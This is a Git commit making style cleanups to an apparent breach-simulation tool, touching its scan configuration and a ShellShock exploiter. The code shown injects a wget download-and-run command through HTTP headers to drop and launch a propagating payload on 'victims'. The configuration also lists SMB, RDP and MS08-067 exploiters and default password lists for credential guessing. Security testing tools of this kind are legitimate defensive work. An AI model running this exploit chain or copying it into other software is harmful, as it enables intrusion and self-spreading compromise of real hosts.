PEP 8 changes

This commit is contained in:
daniel goldberg 2016-08-29 13:48:00 +03:00
parent 1806f9bc62
commit cd27438a1e
3 changed files with 17 additions and 18 deletions

View File

@ -135,7 +135,7 @@ class Configuration(object):
scanner_class = TcpScanner
finger_classes = [SMBFinger, SSHFinger, PingScanner, HTTPFinger]
exploiter_classes = [SmbExploiter, WmiExploiter, RdpExploiter, Ms08_067_Exploiter, # Windows exploits
SSHExploiter, ShellShockExploiter #Linux
SSHExploiter #Linux
]
# how many victims to look for in a single scan iteration
@ -167,11 +167,11 @@ class Configuration(object):
###########################
# Auto detect and scan local subnets
local_network_scan = True
local_network_scan = False
range_class = FixedRange
range_size = 1
range_fixed = ['']
range_fixed = ['10.0.1.160']
# TCP Scanner
HTTP_PORTS = [80, 8080, 443,
@ -201,7 +201,7 @@ class Configuration(object):
psexec_passwords = ["Password1!", "1234", "password", "12345678"]
# ssh exploiter
ssh_users = ["root"]
ssh_users = ["root",'user']
ssh_passwords = ["Password1!", "1234", "password", "12345678"]
# rdp exploiter

View File

@ -16,7 +16,6 @@ __author__ = 'danielg'
LOG = logging.getLogger(__name__)
TIMEOUT = 2
DOWNLOAD_TIMEOUT = 60
TEST_COMMAND = '/bin/uname -a'
DOWNLOAD_TIMEOUT = 60 # copied from rdpgrinder
@ -92,15 +91,14 @@ class ShellShockExploiter(HostExploiter):
LOG.debug("Error running uname machine commad on victim %r: (%s)", host, exc)
return False
src_path = src_path or get_target_monkey(host)
# copy the monkey
dropper_target_path_linux = self._config.dropper_target_path_linux
if (self.skip_exist) and (self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
if self.skip_exist and (self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
LOG.info("Host %s was already infected under the current configuration, done" % host)
return True # return already infected
src_path = src_path or get_target_monkey(host)
if not src_path:
LOG.info("Can't find suitable monkey executable for host %r", host)
return False
@ -111,17 +109,17 @@ class ShellShockExploiter(HostExploiter):
LOG.debug("Exploiter ShellShock failed, http transfer creation failed.")
return False
download_command = '/usr/bin/wget %s -O %s;' % (
http_path, dropper_target_path_linux)
download_and_run = exploit + download_command
resp = self.attack_page(url, header, download_and_run)
download = exploit + download_command
self.attack_page(url, header, download)
http_thread.join(DOWNLOAD_TIMEOUT)
http_thread.stop()
if (http_thread.downloads != 1) or ('ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
if (http_thread.downloads != 1) or (
'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
continue
@ -134,7 +132,7 @@ class ShellShockExploiter(HostExploiter):
cmdline = "%s %s" % (dropper_target_path_linux, MONKEY_ARG)
cmdline += build_monkey_commandline(host, depth - 1) + ' & '
run_path = exploit + cmdline
resp = self.attack_page(url, header, run_path)
self.attack_page(url, header, run_path)
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
self._config.dropper_target_path_linux, host, cmdline)

View File

@ -426,3 +426,4 @@ def report_failed_login(exploiter, machine, user, password):
ControlClient.send_telemetry('exploit', {'result': False, 'machine': machine.__dict__,
'exploiter': exploiter.__class__.__name__,
'user':user,'password':password})